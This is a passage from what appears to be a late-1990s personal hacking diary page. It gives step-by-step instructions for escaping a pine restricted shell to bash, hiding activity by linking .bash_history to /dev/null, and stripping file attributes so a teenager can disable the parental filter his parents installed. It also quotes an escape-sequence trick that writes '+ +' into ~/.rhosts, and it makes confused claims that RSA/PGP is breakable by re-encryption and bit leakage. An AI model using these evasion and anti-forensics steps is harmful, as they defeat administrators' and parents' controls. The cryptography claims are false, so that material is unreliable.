   Ohio 268-302 Oklahoma 440-448 Oregon 540-544 Pennsylvania 159-211
   Philippine Islands 581-585 Puerto Rico 581-585 Rhode Island 035-039
   South Carolina 247-251 South Dakota 503-504 Tennessee 408-415 Texas
   449-467 Utah 528-529 Vermont 008-009 Virgin Islands 580 Virginia
   223-231 Washington 531-539 West Virgina 232-236 Wisconsin 387-399
   Wyoming 520
     _________________________________________________________________
   
   --DATE--2-9-98--Breaking out of the pine shell-- Thought I might put a
   brief entry on here about breaking out of the pine shell. What do I
   mean by that? Well, there are certain systems (I have personally
   encountered 4 exactly like this) that restrict telnet access (or try
   to) by making the shell you use pine (an e-mail editor) verses bash or
   ksh. (This would be the equivelant to being restricted to Eudora in
   Windows 95). You can see why this is annoying. Well, here is one way
   to break out of the shell. First of all, when pine opens up it goes to
   a screen that gives you certain commands. One of which is a setup
   command. You want to select that and then select config. Near the
   bottom are two lines (space bar down until you can't go any farther).
   Somewhere near the bottom will be lines saying "speller" and "image
   viewer". We will just use the first one for the time being. If it says
   "Fixed Value 'spell'" or something like that then you are basically
   screwed using this method. If it doesn't say that then you press
   enter, and type in the words "/bin/bash" into the input box. Then exit
   out of there, and save your new configuration. Then compose a message
   and press control-T. You should get a # sign or something similar.
   Voila! You now have free reign over your own shell account. If you had
   chosen to do this with "image viewer" you would have to send yourself
   a picture file and then tried to use it with the "V" command. Another
   nice little trick to remember is if you have access to a shell
   account, more than likely it also has FTP installed. There is nothing
   stopping you from uploading files (like a .profile or .login file)
   that will open /bin/bash before you ever have a chance to load pine
   up. All useful tricks in a pinch. Very sloppy though, and you WILL
   leave traces (.bash_history) so be careful and make sure to link your
   .bash_history to the null device to cover your tracks (or go back
   through FTP and delete your .bash_history and .profile if you put a
   new one there). You can link your .bash_history to the null device
   with this command "ln -s /dev/null .bash_history". Stay out of trouble
   now! Hasta!
     _________________________________________________________________
   
   --DATE--3-17-98--PGP BREAKABLE???-- Okay, I was talking to a local PGP
   freak today for quite some time, and he told me some things of
   interest involving PGP. First of all this is mostly theory, and very
   little practice, but this could lead the way toward some massive
   attacks against the RSA algorythm. Let's say you have plaintext (P)
   and public key (Kp). When you encrypt P with Kp you get cyphertext
   (C). Pretty simple, right? Okay, here is where it get's a little
   nasty. It turns out that if you encrypt C with Kp multiple times,
   eventually it will lead back to P with O iterations. There is ALSO
   another way to break C back to P there is other variations of bits
   that are close enough that it will break the cyphertext called o. o
   occurs much more often than the guaranteed O and works almost as well.
   o and O depend greatly on the prime number used during encryption.
   (Essentially, when asked if you want quick prime-number generation,
   always say no). Strong prime numbers are prime numbers that when a
   computation is made (something like (x/2)+1) on a prime number, it
   creates another prime number. Strong-strong prime numbers is where you
   can do the operation twice and achieve another prime number. Okay, so
   that is our main attack now, breaking it through brute force. Dealing
   with mod256 this is doable, but when you get to military grade
   encryption 1024 or 2048 bits you are dealing with a whole new problem.
   Yes, it is exhaustivly possible, but it would take more seconds to do
   than in the universe's history. Okay, so here is where our second
   attack come into play. It turns out (mathimatically) that portions
   (fractions) of bits are leaked each time you encrypt something. So if
   your target sends you 10,000 messages you might shave off 500 bits (a
   HUGE reduction in security = 2^1024 - 2^500). That logorythmically
   halves the security on industry grade RSA. The end result is that
   through a combination of attacks through brute force attacks on C with
   Kp and on leaked bits, the RSA algorythm becomes breakable. Scary,
   huh? Hasta!
     _________________________________________________________________
   
   --DATE--3-18-98--PGP BREAKABLE?? II-- This is more on the above topic.
   This is my reply to his reply. I hope you understand. ;) Hasta!
   
     | This sounds exactly like the attack you can accomplish with
     ROT13, if you | don't want to take the task to pen&paper, just use
     ROT13 three times and | you get the original message. No fuss...no
     muss...... Wait, that IS the whole point of ROT13! But it should
     only be ONE iteration to get back from C to P. IE: [8
     leprosy/user/s2/rsnake/bin] cat rot13.c #include <stdio.h> int
     main() { int c; while((c=getchar())!=EOF){
     if(c>='a'&&c<='m')c=c+13; else if(c>='n'&&c<='z')c=c-13; else
     if(c>='A'&&c<='M')c=c+13; else if(c>='N'&&c<='Z')c=c-13;
     putchar(c); } return 0; } [9 leprosy/user/s2/rsnake/bin] gcc
     rot13.c -o rot13 [10 leprosy/user/s2/rsnake/bin] rot13 Hello, this
     is a test. Uryyb, guvf vf n grfg. ^C [11
     leprosy/user/s2/rsnake/bin] rot13 Uryyb, guvf vf n grfg. Hello,
     this is a test. ^C [12 leprosy/user/s2/rsnake/bin] | This only
     *possible* if you have a few hundred years on your hands & a cray |
     super'puter. With mod256? I think it is a little more doable than a
     couple hundred years. I don't know the exact numbers, but it should
     be possible within a few months (assuming you find a o that works
     and not the true O) Remember, we aren't trying to completely crack
     C, we are only trying to get a close approximation. If you get
     close enough, you will be able to understand the P, although
     possibly missing one charachter, or the structure of the text (but
     in the end the jist of the message has been reveled). Not 100%
     reliable, but most certainly broken. | Not really....seeing how the
     majority of the messages that people use | encryption to keep
     private are *time-sensitive*......thus, if someone were | to obtain
     a piece of encrypted mail from me intended for you RSnake...by |
     the time they have run their bruteforces & multiple encrypt
     sessions on | it....the information will be of VERY LITTLE VALUE!
     Think about | it.......unless you have set-up a NTFS to encrypt
     data on every write & | decrypt data on every read on your
     HD....then the messages that you send to | someone using strong
     crypto (*in todays convention anywayz*) usually | contains info
     that is imperative upon a SPEEDY reply/action. If | not....then I
     would take every precaution to encrypt the message ATLEAST | 4-6
     times....then hide the message using steanography inside a B&W |
     *.bmp....this way..the message blends easier with the normal data
     noise | from the bmp. Just my opinion though.......always open for
     | discussion.....usually ending in my opinion changing! ;) First of
     all, your method is the ONLY way, I belive, to truely hide
     information. Stenography is an art which few people understand.
     Stenography, I belive, will have more of a following, once people
     realize it is just a matter of time, before modern computers and
     math can decrypt anything thrown at them. After talking to Kwan
     (the man who wrote SNOW and the ICE crypt function) I now belive
     that stenography is a better failsafe than any level of crypt. If
     they don't know something is crypted, they won't bother to crack
     it. Simple logic. Remove the element of curiosity. I was briefly
     talking to a "spy" for the airforce, whos job it was to accept
     incomming captured PGP messages via radio, and log them, and do
     some sort of decryption on the messages he got. Not to decrypt it
     completely but to try to evaluate the RSA algorythm used to make it
     potentially weaker for future conversations. With this sort of loss
     in security, (hundreds of bits) you could potentially decrypt
     incomming messages in a matter of hours. If this "spy" was doing
     what I think he was doing, he is mearly logging information, so
     that later, finding out the P would be relatively easy. Starting
     now, could potentially make breaking PGP in 5 years as trivial as
     breaking crypt login(1) is now. Of course there will always be a
     better version of PGP, but for those people who don't bother use
     strong strong primes and for those who don't bother to make their
     messages time sensitive, their days are numbered. ;)
     _________________________________________________________________
   
   --DATE--4-1-98--X STOP-- Here is a letter I recieved about a blocking
   program called X Stop.
   
     | Hey there, My friend is having a "problem" with his computer.His
     parents | put "X Stop" on his computer.It's one of those block or
     filter "bad" | internet sight things.I told him to mail, but
     ironically enough,yours is | blocked! :) Anyways,I've been trying
     to help him,but the 2 files | (C:\windows\system\xblock95.dll and
     c:\windows\system\xstop95.exe) are | file protected so they cant be
     corrupted and what not.If you know anyway | to stop this program
     short of formatting could you please tell me?I only | ask you
     because I saw that earlier article on how to stop Full Armor or |
     something like that.Sorry for the long letter :) | Cya! C:\>attrib
     /? Displays or changes file attributes. ATTRIB [+R | -R] [+A | -A]
     [+S | -S] [+H | -H] [[drive:][path]filename] [/S] + Sets an
     attribute. - Clears an attribute. R Read-only file attribute. A
     Archive file attribute. S System file attribute. H Hidden file
     attribute. /S Processes files in all directories in the specified
     path. Hello. First let me say that I laughed out loud with that
     "ironically enough" story. ;) Okay, onto the question, I have never
     encountered this problem, but from your description it should be
     fairly easy. Go into MS-DOS and use the attrib command (the help
     file above shows the syntax). First do an attrib on those two
     files. It will have an R or an A preceeding the files. To make the
     files writable or un-archive them simply type: attrib -R
     xblock95.dll attrib -R xstop95.exe or attrib -A xblock95.dll attrib
     -A xstop95.exe That should make the files manipulative so you can
     either corrupt them, or move them. I hope that helps. Hasta!
     _________________________________________________________________
   
   --DATE--4-21-98--Mindless Babbling-- | On your little page about
   hacking you said: | | Something that has come about recently in the
   news is the new ping | bug. Ok, let me dispell some things about this
   weakness. First of all | it is VERY traceable | | But isn't the ip
   address tagged onto ICMP packets application layer | specific and
   therefore spoofable?...and since you don't ever really NEED | to
   receive a reply from an ICMP packet...you can make it look like it |
   came from anywhere you like? And keeping this in mind, isn't it
   possible | then to spoof ICMP packets with a request for echo reply
   and thus take | down two machines with one fowl swoop? Well... you can
   spoof the packets, yes, but you cannot take down two machines at once.
   Once a machine that is vulnerable is attacked with the ICM packet it
   cannot echo reply (because it is down). Therefore you could not
   recieve an echo from it. Also, this is NOT untraceable if the machine
   you are attacking is running a current version of Bind or is watching
   netstat. It would be less traceable surely, however, far from perfect.
   | and... | | >Uhm, Carnie? Just to clarify, that "virus" is just a
   chain mail. | >It is totally impossible to send a virus over e-mail,
   is is totally | >impossible to activate it by reading it (as it e-mail
   is not an | >executable file, it is just text | | But is it not
   possible for a malicious author of an email client or | filter program
   to have a portion of code triggered by a particular | string of text?
   Of course it is. We have to rely on the validity of the code we are
   currently using. Same is true with the operating system you are using,
   you trust it is valid and backdoors aren't built into it for the most
   part. I wouldn't put it past Microsoft or any small software firms,
   but for the most part I think that is a fairly paranoid perspective
   (that backdoors are intentionally installed). If you are really
   worried about it code your own e-mail client and give out the source
   so people know you aren't making a backdoor yourself. ;) | and...about
   flash.c | | If the victim is running vt100 and has mesg y, you can
   mess him up pretty | bad with this. I have seen it not work, in some
   instances, but usually | it does | | It is possible using escape
   sequences to request an echo from a Wyse50 | Terminal...so you can
   send a command like echo "+ +" > ~/.rhosts and | request an echo from
   the terminal...which will make the user run the | command...but you
   prolly already knew that. Right, but that type of system is pretty
   out-dated. The term attack is not really an exploit, it is more of a
   trick, or a DoS if you do it right. What you are talking about is
   using the Wyse system to execute arbitrary commands. Your attack is
   completely different from the flash.c attack. I have never tried that
   attack, because I have never had access to a Wyse system. I will say
   that there are similar attacks that can be run from inside networks.
   Spoofing from the inside of a network, you can get machines to
   essentially give you information about the NFS and if the machines
   don't force you to authenticate it is trivial to get access to the
   primary name server. Active spoofing is often times more productive
   than passive sniffing on sub-nets. Anyway, that's enough babbling for
   today. Hasta!
     _________________________________________________________________
   
   --END--
     _________________________________________________________________
   
   This page was created using vi (for UNIX 10.20) and Lemmy (ver 2.0b
   for Windows `95). It was created to work with Lynx, and all graphical
   and nongraphical browsers alike. If you don't like the formatting,
   tell me a better way to do it and I will be more than happy to let you
   write about 200k worth of hacking text over for me.
     _________________________________________________________________
   
                            [S-ALCHEMY] [RSNAKE]
                                  [LINK] 
                                      
     No death threats or poetry please. Just kidding, no poetry please.
